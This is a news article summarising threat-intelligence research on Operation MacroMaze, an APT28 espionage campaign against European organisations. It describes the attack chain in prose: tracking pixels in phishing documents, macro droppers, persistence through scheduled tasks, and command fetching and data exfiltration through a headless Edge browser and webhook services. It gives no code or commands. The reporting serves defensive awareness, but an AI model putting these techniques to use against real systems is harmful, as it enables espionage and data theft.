A new cyber espionage campaign has been linked to the Russia-associated threat group APT28, targeting entities across Western and Central Europe. According to S2 Grupo’s LAB52 threat intelligence team, the cyber activity ran between September 2025 and January 2026 and has been named Operation MacroMaze. Researchers said the cyber attack relies on simple tools and legitimate online services to manage infrastructure and carry out data exfiltration. “The campaign relies on basic tooling and the exploitation of legitimate services for infrastructure and data exfiltration,” the cybersecurity firm stated.
The cyber intrusion begins with spear-phishing emails containing malicious documents. These documents include an XML field called “INCLUDEPICTURE” that connects to a webhook[.]site URL hosting a JPG image. When opened, the file fetches the image from the remote server, triggering an outbound HTTP request. This cyber technique works like a tracking pixel, allowing attackers to log metadata and confirm the document was opened by the target.
Between late September 2025 and January 2026, multiple versions of the malicious files were discovered. Each contained slightly modified macros but followed the same cyber attack logic. The macros function as droppers, helping establish access on compromised systems and deploy additional payloads. “While the core logic of all the macros detected remains consistent, the scripts show an evolution in evasion techniques, ranging from ‘headless’ browser execution in the older version to the use of keyboard simulation (SendKeys) in the newer versions to potentially bypass security prompts,” the cybersecurity company explained.
The macro executes a Visual Basic Script (VBScript), which runs a CMD file to maintain persistence using scheduled tasks. A batch script then loads a small Base64-encoded HTML payload in Microsoft Edge in headless mode to reduce cyber detection. It retrieves commands from webhook[.]site, executes them, captures output and exfiltrates the data to another webhook endpoint. A second variant moves the browser off-screen instead of using headless mode and closes other Edge processes. “When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction,” LAB52 said. The firm added, “This campaign proves that simplicity can be powerful,” underscoring how basic tools were arranged carefully to increase cyber stealth and effectiveness.
Also read: Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream LinkedIn | The Mainstream Facebook | The Mainstream Youtube | The Mainstream Twitter
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
